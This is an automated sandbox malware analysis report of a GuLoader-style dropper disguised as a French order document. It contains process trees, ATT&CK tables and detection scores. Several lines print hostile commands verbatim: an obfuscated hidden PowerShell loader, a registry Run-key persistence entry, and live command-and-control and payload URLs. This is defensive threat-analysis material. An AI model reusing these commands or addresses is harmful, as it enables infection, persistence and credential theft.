            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical rows)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7432
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2299
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 1968
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3212 | Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6900 | Thread sleep count: 1968 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Last function: Thread delayed (2 identical rows)
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread sleep count: Count: 1968 delay: -5
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00405FE2 FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00402645 FindFirstFileA
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.3324148193.0000000009A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWj
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | API call chain: ExitProcess graph end node graph_0-3170
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | API call chain: ExitProcess graph end node graph_0-3328
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort (10 identical rows)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_05C4C53D Sleep,LdrInitializeThunk,NtProtectVirtualMemory,7_2_05C4C53D
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write (12 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: unknown protection: execute and read and write (9 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section unmapped: unknown base address: 400000 (5 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4160000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2ECFDEC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe" (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: unknown unknown (11 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$interlucent=get-content 'c:\users\user\appdata\local\salpetersyrefabrikkers\occupying\nonsynoptic168\unvolubly\langtrkkendes\pelletising.art';$sciography=$interlucent.substring(57898,3);.$sciography($interlucent)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "emraud" /t reg_expand_sz /d "%skraastillinger% -windowstyle minimized $boplskommunens=(get-itemproperty -path 'hkcu:\somervillite\').efs;%skraastillinger% ($boplskommunens)"
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles8
Source: wab.exe, 00000007.00000002.3324378709.0000000009A77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2945584583.0000000009A76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe Code function: 0_2_00405D00 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D00

            Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

            Remote Access Functionality

Source: Yara match File source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 312 Process Injection | 1 Obfuscated Files or Information | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Shared Modules | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Software Packing | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 11 Command and Scripting Interpreter | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 312 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1431988; Sample: Commande No 00007 de M.N.S....; Startdate: 26/04/2024; Architecture: WINDOWS; Score: 100
Contacted domains: learfo55ozj01.duckdns.org, ricohltd.top, geoplugin.net
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 11 other signatures; Uses dynamic DNS services (learfo55ozj01.duckdns.org)
Process tree:
Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe (started)
  dropped: C:\Users\user\AppData\...\Pelletising.Art, ASCII
  signatures: Suspicious powershell command line found
  powershell.exe (started)
    dropped: Commande No 00007 ...NS Distribution.exe, PE32
    signatures: Obfuscated command line found; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
    wab.exe (started)
      network: learfo55ozj01.duckdns.org 193.222.96.21, 29871, 49708, 49709 SWISSCOMSwisscomSwitzerlandLtdCH Germany; ricohltd.top 172.67.191.112, 443, 49707 CLOUDFLARENETUS United States; geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands
      dropped: C:\Users\user\AppData\Roaming\mqerms.dat, data
      signatures: Maps a DLL or memory area into another process; Sample uses process hollowing technique; Installs a global keyboard hook
      cmd.exe (started)
        conhost.exe (started)
        reg.exe (started)
      wab.exe (started)
        WerFault.exe (started)
      wab.exe (started)
        WerFault.exe (started)
      11 other processes
        WerFault.exe (started, 3 instances)
        2 other processes
    conhost.exe (started)
    cmd.exe (started)

            SourceDetectionScannerLabelLink
            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe27%VirustotalBrowse
            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe8%ReversingLabs
            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe26%ReversingLabsWin32.Trojan.Guloader
            C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe27%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            learfo55ozj01.duckdns.org13%VirustotalBrowse
            geoplugin.net4%VirustotalBrowse
            ricohltd.top20%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://geoplugin.net/json.gp100%URL Reputationphishing
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://geoplugin.net/json.gprfo20%Avira URL Cloudsafe
            http://geoplugin.net/json.gpe0%Avira URL Cloudsafe
            https://ricohltd.top/aCqwFQDQz144.bin100%Avira URL Cloudmalware
            https://ricohltd.top/aCqwFQDQz144.bin-_100%Avira URL Cloudmalware
            http://geoplugin.net/json.gpP0%Avira URL Cloudsafe
            learfo55ozj01.duckdns.org100%Avira URL Cloudmalware
            http://geoplugin.net/json.gpen0%Avira URL Cloudsafe
            https://ricohltd.top/-100%Avira URL Cloudmalware
            https://ricohltd.top/100%Avira URL Cloudmalware
            https://ricohltd.top/aCqwFQDQz144.bin18%VirustotalBrowse
